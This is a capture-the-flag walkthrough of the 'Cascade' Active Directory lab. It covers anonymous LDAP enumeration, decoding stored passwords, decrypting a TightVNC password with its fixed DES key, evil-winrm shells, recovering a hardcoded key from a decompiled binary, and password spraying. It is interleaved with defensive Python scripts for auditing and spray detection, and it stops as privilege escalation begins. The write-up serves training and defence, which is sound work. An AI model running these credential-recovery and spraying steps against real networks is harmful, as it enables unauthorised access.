Proof of Concept
10.129.2.120
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49165/tcp open unknown
Information Gathering
Collecting host information
┌──(kali㉿kali)-[~/Cascade]
└─$ nxc smb 10.129.2.120 --generate-hosts-file hosts
SMB 10.129.2.120 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Cascade]
└─$ cat hosts
10.129.2.120 CASC-DC1.cascade.local cascade.local CASC-DC1
Configuring /etc/hosts
┌──(kali㉿kali)-[~/Cascade]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.2.120 CASC-DC1.cascade.local cascade.local CASC-DC1
Initial Access
LDAP allows anonymous (unauthenticated) binds
┌──(kali㉿kali)-[~/Cascade]
└─$ ldapsearch -x -H ldap://10.129.2.120 -D '' -w '' -b "DC=cascade,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=cascade,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# cascade.local
dn: DC=cascade,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=cascade,DC=local
instanceType: 5
whenCreated: 20200109153132.0Z
whenChanged: 20260224151604.0Z
subRefs: DC=ForestDnsZones,DC=cascade,DC=local
subRefs: DC=DomainDnsZones,DC=cascade,DC=local
subRefs: CN=Configuration,DC=cascade,DC=local
uSNCreated: 4099
uSNChanged: 344149
name: cascade
objectGUID:: BEPTb7rgSEuSvojkxZJmOA==
creationTime: 134164197644212350
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -9223372036854775808
minPwdAge: 0
<SNIP>
The LDAP results contain a Base64-encoded password
- clk0bjVldmE=
┌──(kali㉿kali)-[~/Cascade]
└─$ ldapsearch -x -H ldap://10.129.2.120 -D '' -w '' -b "DC=cascade,DC=local" | grep -i pwd
maxPwdAge: -9223372036854775808
minPwdAge: 0
minPwdLength: 5
pwdProperties: 0
pwdHistoryLength: 0
badPwdCount: 0
pwdLastSet: 0
maxPwdAge: -37108517437440
minPwdAge: 0
minPwdLength: 0
pwdProperties: 0
pwdHistoryLength: 0
badPwdCount: 0
pwdLastSet: 134164197918616832
badPwdCount: 0
pwdLastSet: 132230603002172876
badPwdCount: 0
pwdLastSet: 132247150854857364
badPwdCount: 0
pwdLastSet: 132230718862636251
cascadeLegacyPwd: clk0bjVldmE=
<SNIP>
Identifying the account that owns this password
┌──(kali㉿kali)-[~/Cascade]
└─$ ldapsearch -x -H ldap://10.129.2.120 -D '' -w '' -b "DC=cascade,DC=local" | grep -i cascadeLegacyPwd -B10
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
Decoding the encoded value yields the plaintext password
- rY4n5eva
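The attribute above is only Base64, and the same kind of finding recurs later in this write-up on a deleted object. The following Python script is an added example, not part of the original write-up: it parses ldapsearch LDIF output (comments, "::" binary values and folded continuation lines included) and reports any non-schema attribute whose value decodes to printable text, which is what an audit of a directory for legacy password attributes looks like. The sample LDIF, the r.thompson DN in it and the STANDARD_ATTRS list are constructed stand-ins; a real audit would load the attribute names from the schema.

```python
"""Audit an LDIF dump for non-schema attributes that carry base64-encoded
plaintext, as cascadeLegacyPwd did on this box. Added example; not part of
the original write-up. The sample LDIF below is constructed to mirror the
ldapsearch output in the write-up (the user DN is made up)."""
import base64
import binascii
import re

# Constructed LDIF. LDIF writes genuinely binary values with "::" (objectGUID
# below), folds long values onto continuation lines that start with a single
# space, and uses "#" for comments; the parser has to cope with all three.
SAMPLE_LDIF = """\
# extended LDIF
#
# cascade.local
dn: DC=cascade,DC=local
objectClass: top
objectClass: domain
name: cascade
objectGUID:: BEPTb7rgSEuSvojkxZJmOA==
maxPwdAge: -9223372036854775808

# constructed user entry
dn: CN=r.thompson,CN=Users,DC=cascade,DC=local
objectClass: user
sAMAccountName: r.thompson
userPrincipalName: r.thompson@cascade.local
description: Legacy account, migrated fr
 om the old domain
cascadeLegacyPwd: clk0bjVldmE=
"""

_ATTR_RE = re.compile(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$")
_B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Attributes that are expected and whose values are not second-guessed.
# Constructed short list; a real audit would load the schema's attribute names.
STANDARD_ATTRS = {
    "dn", "objectclass", "objectguid", "objectsid", "name", "distinguishedname",
    "samaccountname", "userprincipalname", "description", "maxpwdage",
}


def parse_ldif(text):
    """Parse LDIF into a list of {attr: [values]} dicts, one per entry.

    "::" values are base64-decoded; they come back as str when they are
    UTF-8 and as bytes otherwise. Continuation lines are re-joined."""
    entries = []
    current = {}
    pending = None  # [attr, raw_value, is_base64] until the value is complete

    def flush():
        nonlocal pending
        if pending is None:
            return
        attr, raw, is_base64 = pending
        value = raw
        if is_base64:
            try:
                value = base64.b64decode(raw, validate=True)
                value = value.decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                pass  # keep bytes (or the raw text if it was not valid base64)
        current.setdefault(attr, []).append(value)
        pending = None

    for line in text.splitlines():
        if line.startswith(" ") and pending is not None:
            pending[1] += line[1:]  # folded continuation of the previous value
            continue
        flush()
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = _ATTR_RE.match(line)
        if m:
            pending = [m.group(1), m.group(3), m.group(2) == "::"]
    flush()
    if current:
        entries.append(current)
    return entries


def decode_secret(value):
    """Return the decoded text if value is base64 of short printable ASCII,
    else None. Length and charset checks keep ordinary words from matching."""
    if not isinstance(value, str) or len(value) < 8 or len(value) % 4:
        return None
    if not _B64_RE.match(value):
        return None
    try:
        decoded = base64.b64decode(value, validate=True)
    except binascii.Error:
        return None
    if not 4 <= len(decoded) <= 64 or any(b < 32 or b > 126 for b in decoded):
        return None
    return decoded.decode("ascii")


def find_encoded_secrets(entries, standard_attrs=STANDARD_ATTRS):
    """Return (dn, attribute, decoded_text) for every non-standard attribute
    whose value decodes as printable text; these are the findings to chase."""
    hits = []
    for entry in entries:
        dn = entry.get("dn", ["<no dn>"])[0]
        for attr, values in entry.items():
            if attr.lower() in standard_attrs:
                continue
            for value in values:
                decoded = decode_secret(value)
                if decoded is not None:
                    hits.append((dn, attr, decoded))
    return hits


if __name__ == "__main__":
    for dn, attr, text in find_encoded_secrets(parse_ldif(SAMPLE_LDIF)):
        print(f"{dn}: {attr} decodes to {text!r}")
```

Feed it a full ldapsearch dump saved to a file; every hit is a credential stored in the directory in recoverable form, and because anonymous binds are allowed here, readable by anyone on the network. The fix is to rotate the password, clear the attribute, and disable anonymous LDAP access.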
┌──(kali㉿kali)-[~/Cascade]
└─$ echo -n 'clk0bjVldmE=' | base64 -d
rY4n5eva
SMB authentication with the recovered r.thompson credentials succeeds
┌──(kali㉿kali)-[~/Cascade]
└─$ nxc smb cascade.local -u 'r.thompson' -p 'rY4n5eva'
SMB 10.129.2.120 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.2.120 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
Enumerating SMB shares as r.thompson shows read access to the Data share
┌──(kali㉿kali)-[~/Cascade]
└─$ nxc smb 10.129.2.120 -u 'r.thompson' -p 'rY4n5eva' --shares --timeout 60
SMB 10.129.2.120 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.2.120 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.129.2.120 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.2.120 445 CASC-DC1 Share Permissions Remark
SMB 10.129.2.120 445 CASC-DC1 ----- ----------- ------
SMB 10.129.2.120 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.2.120 445 CASC-DC1 Audit$
SMB 10.129.2.120 445 CASC-DC1 C$ Default share
SMB 10.129.2.120 445 CASC-DC1 Data READ
SMB 10.129.2.120 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.2.120 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.2.120 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.2.120 445 CASC-DC1 SYSVOL READ Logon server share
Connecting to the Data share
┌──(kali㉿kali)-[~/Cascade]
└─$ smbclient //cascade.local/Data/ -U 'r.thompson'
Password for [WORKGROUP\r.thompson]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jan 26 22:27:34 2020
.. D 0 Sun Jan 26 22:27:34 2020
Contractors D 0 Sun Jan 12 20:45:11 2020
Finance D 0 Sun Jan 12 20:45:06 2020
IT D 0 Tue Jan 28 13:04:51 2020
Production D 0 Sun Jan 12 20:45:18 2020
Temps D 0 Sun Jan 12 20:45:15 2020
6553343 blocks of size 4096. 1626893 blocks available
“VNC Install.reg” found in the \IT\Temp\s.smith directory
smb: \> cd IT
smb: \IT\> dir
. D 0 Tue Jan 28 13:04:51 2020
.. D 0 Tue Jan 28 13:04:51 2020
Email Archives D 0 Tue Jan 28 13:00:30 2020
LogonAudit D 0 Tue Jan 28 13:04:40 2020
Logs D 0 Tue Jan 28 19:53:04 2020
Temp D 0 Tue Jan 28 17:06:59 2020
smb: \IT\> cd Temp
smb: \IT\Temp\> dir
. D 0 Tue Jan 28 17:06:59 2020
.. D 0 Tue Jan 28 17:06:59 2020
r.thompson D 0 Tue Jan 28 17:06:53 2020
s.smith D 0 Tue Jan 28 15:00:01 2020
6553343 blocks of size 4096. 1627151 blocks available
smb: \IT\Temp\> cd s.smith
smb: \IT\Temp\s.smith\> dir
. D 0 Tue Jan 28 15:00:01 2020
.. D 0 Tue Jan 28 15:00:01 2020
VNC Install.reg A 2680 Tue Jan 28 14:27:44 2020
6553343 blocks of size 4096. 1627151 blocks available
smb: \IT\Temp\s.smith\> get "VNC Install.reg"
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (1.5 KiloBytes/sec) (average 1.9 KiloBytes/sec)
“VNC Install.reg” contains a password as a hex value (6b,cf,2a,4b,6e,5a,ca,0f)
┌──(kali㉿kali)-[~/Cascade]
└─$ cat VNC\ Install.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
<SNIP>
Decrypting the value with the fixed DES key that TightVNC uses to obfuscate stored passwords yields s.smith's plaintext password
- s.smith:sT333ve2
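The .reg file above is a regedit export: UTF-16LE with a byte-order mark, bracketed key paths, and typed values (dword:, hex:, quoted strings), with long hex values folded across lines that end in a backslash. The Python below is an added example, not code from the write-up: it decodes such a file, parses it into keys and typed values, and flags the TightVNC Server Password value as a recoverable secret, since TightVNC only obfuscates it with a fixed DES key that is identical in every installation (the openssl command that follows in the write-up performs that decryption; the parser stops at flagging). The sample export and its "Blob" value are constructed.

```python
"""Parse a Windows .reg export and flag registry values that hold secrets a
reader of the file can recover. Added example for this write-up, not code
from the original; the sample export below is constructed after the
'VNC Install.reg' listing (the 'Blob' value is made up to exercise
continuation lines)."""
import re

# regedit writes .reg files as UTF-16LE with a byte-order mark and CRLF line
# endings, which is why a plain `cat` shows two stray bytes at the top.
SAMPLE_REG_BYTES = b"\xff\xfe" + "\r\n".join([
    "Windows Registry Editor Version 5.00",
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]",
    "",
    r"[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]",
    '"ExtraPorts"=""',
    '"QueryTimeout"=dword:0000001e',
    '"RfbPort"=dword:0000170c',
    '"UseVncAuthentication"=dword:00000001',
    '"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f',
    '"Blob"=hex:00,01,\\',   # constructed: regedit folds long hex values like this
    '  02,03',
    "",
]).encode("utf-16-le")

_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')
_HEX_RE = re.compile(r"^hex(?:\([0-9a-fA-F]+\))?:(.*)$")


def decode_reg(data):
    """Turn raw .reg bytes into text, honouring the BOM regedit writes."""
    if data.startswith(b"\xff\xfe"):
        return data[2:].decode("utf-16-le")
    if data.startswith(b"\xef\xbb\xbf"):
        return data[3:].decode("utf-8")
    return data.decode("utf-8", "replace")


def _hex_to_bytes(text):
    return bytes(int(h, 16) for h in text.split(",") if h.strip())


def parse_reg(text):
    """Return {key_path: {value_name: (kind, value)}} with kind in
    {'sz', 'dword', 'hex'}; hex values are bytes, dwords are ints."""
    keys = {}
    current = None
    folded = None  # (name, hex_so_far) while a hex value spans several lines
    for line in text.splitlines():
        line = line.strip()
        if folded is not None:
            name, so_far = folded
            so_far += line
            if so_far.endswith("\\"):
                folded = (name, so_far[:-1])
            else:
                keys[current][name] = ("hex", _hex_to_bytes(so_far))
                folded = None
            continue
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None:
            continue
        if line.startswith("@="):
            name, raw = "@", line[2:]
        else:
            m = _VALUE_RE.match(line)
            if not m:
                continue
            name, raw = m.group(1), m.group(2)
        hexm = _HEX_RE.match(raw)
        if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
            keys[current][name] = ("sz", raw[1:-1].replace('\\"', '"').replace("\\\\", "\\"))
        elif raw.startswith("dword:"):
            keys[current][name] = ("dword", int(raw[6:], 16))
        elif hexm:
            body = hexm.group(1)
            if body.endswith("\\"):
                folded = (name, body[:-1])
            else:
                keys[current][name] = ("hex", _hex_to_bytes(body))
    return keys


# Registry values whose content is only obfuscated, not protected. TightVNC
# stores the server password as 8 bytes of DES under a fixed key shared by
# every installation, so anyone who can read the file can read the password;
# treat a copy found on a share as a plaintext credential.
RECOVERABLE_SECRETS = {
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server", "Password"),
}


def find_recoverable_secrets(keys):
    """Return (key, name, raw_bytes) for every value listed in RECOVERABLE_SECRETS."""
    wanted = {(k.lower(), n.lower()) for k, n in RECOVERABLE_SECRETS}
    hits = []
    for key, values in keys.items():
        for name, (kind, value) in values.items():
            if (key.lower(), name.lower()) in wanted and kind == "hex":
                hits.append((key, name, value))
    return hits


if __name__ == "__main__":
    parsed = parse_reg(decode_reg(SAMPLE_REG_BYTES))
    for key, name, value in find_recoverable_secrets(parsed):
        print(f"[{key}] {name} = {value.hex()} (recoverable; rotate it and remove the file from the share)")
```

Pointed at a file share, the same loop over every *.reg file turns up exported configuration that carries credentials; a hit means the VNC password must be changed and the export deleted, because the obfuscation adds no protection against anyone with read access.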
┌──(kali㉿kali)-[~/Cascade]
└─$ echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d -provider legacy -provider default | hexdump -Cv
00000000 73 54 33 33 33 76 65 32 |sT333ve2|
Connecting via WinRM as s.smith
┌──(kali㉿kali)-[~/Cascade]
└─$ evil-winrm -i cascade.local -u 's.smith' -p 'sT333ve2'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents>
Read user.txt
*Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt
49be0236b6a52d4a24ea31f6ea48a862
*Evil-WinRM* PS C:\Users\s.smith\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 4:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::9079:58d1:e378:4e86
Link-local IPv6 Address . . . . . : fe80::9079:58d1:e378:4e86%15
IPv4 Address. . . . . . . . . . . : 10.129.2.120
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%15
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb
Lateral Movement (auth as arksvc)
The s.smith account has access to the Audit$ share
┌──(kali㉿kali)-[~/Cascade]
└─$ nxc smb 10.129.2.120 -u 's.smith' -p 'sT333ve2' --shares --timeout 60
SMB 10.129.2.120 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.2.120 445 CASC-DC1 [+] cascade.local\s.smith:sT333ve2
SMB 10.129.2.120 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.2.120 445 CASC-DC1 Share Permissions Remark
SMB 10.129.2.120 445 CASC-DC1 ----- ----------- ------
SMB 10.129.2.120 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.2.120 445 CASC-DC1 Audit$ READ
SMB 10.129.2.120 445 CASC-DC1 C$ Default share
SMB 10.129.2.120 445 CASC-DC1 Data READ
SMB 10.129.2.120 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.2.120 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.2.120 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.2.120 445 CASC-DC1 SYSVOL READ Logon server share
CascAudit.exe and RunAudit.bat found in the Audit$ share, alongside a DB directory
┌──(kali㉿kali)-[~/Cascade]
└─$ smbclient //cascade.local/Audit$/ -U 's.smith%sT333ve2'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Jan 29 13:01:26 2020
.. D 0 Wed Jan 29 13:01:26 2020
CascAudit.exe An 13312 Tue Jan 28 16:46:51 2020
CascCrypto.dll An 12288 Wed Jan 29 13:00:20 2020
DB D 0 Tue Jan 28 16:40:59 2020
RunAudit.bat A 45 Tue Jan 28 18:29:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 02:38:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 02:38:38 2019
x64 D 0 Sun Jan 26 17:25:27 2020
x86 D 0 Sun Jan 26 17:25:27 2020
6553343 blocks of size 4096. 1619652 blocks available
smb: \> get CascAudit.exe
getting file \CascAudit.exe of size 13312 as CascAudit.exe (10.6 KiloBytes/sec) (average 10.6 KiloBytes/sec)
smb: \> get RunAudit.bat
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.0 KiloBytes/sec) (average 6.0 KiloBytes/sec)
Audit.db additionally found in the DB directory
smb: \> cd DB
smb: \DB\> dir
. D 0 Tue Jan 28 16:40:59 2020
.. D 0 Tue Jan 28 16:40:59 2020
Audit.db An 24576 Tue Jan 28 16:39:24 2020
6553343 blocks of size 4096. 1619653 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (20.0 KiloBytes/sec) (average 10.9 KiloBytes/sec)
Audit.db is a SQLite database; its LDAP table holds an encrypted credential for the ArkSvc account
- ArkSvc:BQO5l5Kj9MdErXx6Q6AGOw==
┌──(kali㉿kali)-[~/Cascade]
└─$ file Audit.db
Audit.db: SQLite 3.x database, last written using SQLite version 3027002, file counter 60, database pages 6, 1st free page 6, free pages 1, cookie 0x4b, schema 4, UTF-8, version-valid-for 60
RunAudit.bat runs CascAudit.exe with Audit.db as its argument
┌──(kali㉿kali)-[~/Cascade]
└─$ cat RunAudit.bat
CascAudit.exe "\\CASC-DC1\Audit$\DB\Audit.db"
Analyzing CascAudit.exe in dnSpy shows that it reads Audit.db and decrypts the stored password with a key hardcoded in the binary; replaying that routine recovers the encrypted password
- w3lc0meFr31nd
// Decompiled fragment (dnSpy). The using directives, the Main wrapper and the
// variable declarations are reconstructed context so the fragment reads as a
// whole; the statements from sqliteConnection.Open() onward are as decompiled.
using System;
using System.Data.SQLite;
using Microsoft.VisualBasic.CompilerServices;

static void Main(string[] args)
{
    string str = "";
    string str2 = "";
    string password = "";
    // RunAudit.bat passes the path to Audit.db as the only argument (reconstructed)
    SQLiteConnection sqliteConnection = new SQLiteConnection("Data Source=" + args[0] + ";Version=3;");
    sqliteConnection.Open();
    using (SQLiteCommand sqliteCommand = new SQLiteCommand("SELECT * FROM LDAP", sqliteConnection))
    {
        using (SQLiteDataReader sqliteDataReader = sqliteCommand.ExecuteReader())
        {
            sqliteDataReader.Read();
            str = Conversions.ToString(sqliteDataReader["Uname"]);
            str2 = Conversions.ToString(sqliteDataReader["Domain"]);
            string text = Conversions.ToString(sqliteDataReader["Pwd"]);
            try
            {
                // hardcoded key; Crypto.DecryptString is presumably the routine in
                // CascCrypto.dll, which sits next to the executable in the share
                password = Crypto.DecryptString(text, "c4scadek3y654321");
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error decrypting password: " + ex.Message);
                return;
            }
        }
    }
    sqliteConnection.Close();
}
Extracting AD users
┌──(kali㉿kali)-[~/Cascade]
└─$ impacket-GetADUsers -all 'cascade.local/s.smith:sT333ve2' -dc-ip 10.129.2.120
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Querying 10.129.2.120 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
administrator 2020-03-23 04:39:41.663064 2026-02-24 10:17:26.985883
CascGuest <never> <never>
krbtgt 2020-01-09 10:32:15.845632 <never>
arksvc 2020-01-09 11:18:20.217288 2020-01-29 16:05:40.988784
s.smith 2020-01-28 14:58:05.485736 2020-01-28 18:26:39.084234
r.thompson 2020-01-09 14:31:26.263625 2026-02-24 10:52:15.907552
util 2020-01-12 21:07:11.195585 2020-01-28 13:09:47.107123
j.wakefield 2020-01-09 15:34:44.415012 <never>
s.hickson 2020-01-12 20:24:27.800396 <never>
j.goodhand 2020-01-12 20:40:26.032079 <never>
a.turnbull 2020-01-12 20:43:13.357973 <never>
e.crowe 2020-01-12 22:45:02.166946 <never>
b.hanson 2020-01-13 11:35:39.153866 <never>
d.burman 2020-01-13 11:36:12.959125 <never>
BackupSvc 2020-01-13 11:37:03.191213 <never>
j.allen 2020-01-13 12:23:59.916560 <never>
i.croft 2020-01-15 16:46:21.865201 <never>
Password spraying the recovered password across the user list succeeds for arksvc
- arksvc:w3lc0meFr31nd
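Seen from the domain controller, the spray above is one source trying a single password against many accounts within a few seconds: a run of failed logons (event 4625, or 4771 for Kerberos pre-authentication) spread over distinct user names, often followed by one success. The Python below is an added detection example, not code from the write-up; its JSON-lines records are constructed to mirror the nxc output above, and the field names are assumptions for whatever log pipeline feeds it.

```python
"""Flag password-spray activity in authentication logs: many distinct accounts
failing from one source inside a short window, sometimes followed by a success.
Added example for this write-up; the records below are constructed to mirror
what the nxc run above leaves in a domain controller's security log."""
import json
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed records, not real log data. A real pipeline would map Windows
# event 4625 (or 4771 for Kerberos) fields onto these assumed keys.
SAMPLE_EVENTS = """\
{"time": "2026-02-24T10:52:01", "source_ip": "10.10.14.5", "target_user": "administrator", "outcome": "failure"}
{"time": "2026-02-24T10:52:02", "source_ip": "10.10.14.5", "target_user": "CascGuest", "outcome": "failure"}
{"time": "2026-02-24T10:52:03", "source_ip": "10.10.14.5", "target_user": "krbtgt", "outcome": "failure"}
{"time": "2026-02-24T10:52:04", "source_ip": "10.10.14.5", "target_user": "arksvc", "outcome": "success"}
{"time": "2026-02-24T09:15:00", "source_ip": "10.129.2.50", "target_user": "s.smith", "outcome": "failure"}
{"time": "2026-02-24T09:15:30", "source_ip": "10.129.2.50", "target_user": "s.smith", "outcome": "failure"}
{"time": "2026-02-24T09:16:10", "source_ip": "10.129.2.50", "target_user": "s.smith", "outcome": "success"}
"""


def load_events(text):
    """Parse JSON-lines auth records into dicts with a datetime 'time'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        rec["time"] = datetime.fromisoformat(rec["time"])
        events.append(rec)
    return events


def detect_spray(events, window_seconds=60, min_distinct_users=3):
    """Return one alert per source whose failures cover at least
    min_distinct_users distinct accounts within any window_seconds span.
    One account failing repeatedly (a user mistyping) never trips this,
    whatever the count; it is the spread across accounts that matters."""
    by_source = defaultdict(list)
    for rec in events:
        by_source[rec["source_ip"]].append(rec)

    window = timedelta(seconds=window_seconds)
    alerts = []
    for source, recs in by_source.items():
        recs.sort(key=lambda r: r["time"])
        failures = [r for r in recs if r["outcome"] == "failure"]
        best, best_span = set(), None
        for i, start in enumerate(failures):
            users, end_time = set(), start["time"]
            for r in failures[i:]:
                if r["time"] - start["time"] > window:
                    break
                users.add(r["target_user"])
                end_time = r["time"]
            if len(users) > len(best):
                best, best_span = users, (start["time"], end_time)
        if len(best) < min_distinct_users:
            continue
        first, last = best_span
        # a success from the same source right after the burst is the account
        # the spray landed on; surface it so response starts with that account
        successes = sorted({r["target_user"] for r in recs
                            if r["outcome"] == "success"
                            and first <= r["time"] <= last + window})
        alerts.append({
            "source_ip": source,
            "failed_users": sorted(best),
            "first_seen": first.isoformat(),
            "last_seen": last.isoformat(),
            "successes": successes,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(load_events(SAMPLE_EVENTS)):
        print(json.dumps(alert, indent=2))
```

Note that lockoutThreshold is 0 in the domain policy dumped earlier, so a spray here produces no lockouts to notice; the distinct-user count per source is the signal to alert on, and the account listed under "successes" is the one to reset first.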
┌──(kali㉿kali)-[~/Cascade]
└─$ nxc smb cascade.local -u userlist.txt -p 'w3lc0meFr31nd' --timeout 60
SMB 10.129.2.120 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB 10.129.2.120 445 CASC-DC1 [-] cascade.local\administrator:w3lc0meFr31nd STATUS_LOGON_FAILURE
SMB 10.129.2.120 445 CASC-DC1 [-] cascade.local\CascGuest:w3lc0meFr31nd STATUS_LOGON_FAILURE
SMB 10.129.2.120 445 CASC-DC1 [-] cascade.local\krbtgt:w3lc0meFr31nd STATUS_LOGON_FAILURE
SMB 10.129.2.120 445 CASC-DC1 [+] cascade.local\arksvc:w3lc0meFr31nd
Connecting via WinRM as arksvc
┌──(kali㉿kali)-[~/Cascade]
└─$ evil-winrm -i cascade.local -u 'arksvc' -p 'w3lc0meFr31nd'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents>
Privilege Escalation
arksvc is a member of the “AD Recycle Bin” group
*Evil-WinRM* PS C:\Users\arksvc\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ==============================================
cascade\arksvc S-1-5-21-3332504370-1206983947-1165150453-1106
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CASCADE\Data Share Alias S-1-5-21-3332504370-1206983947-1165150453-1138 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\IT Alias S-1-5-21-3332504370-1206983947-1165150453-1113 Mandatory group, Enabled by default, Enabled group, Local Group
CASCADE\AD Recycle Bin Alias S-1-5-21-3332504370-1206983947-1165150453-1119 Mandatory group, Enabled by default, Enabled group, Local Group
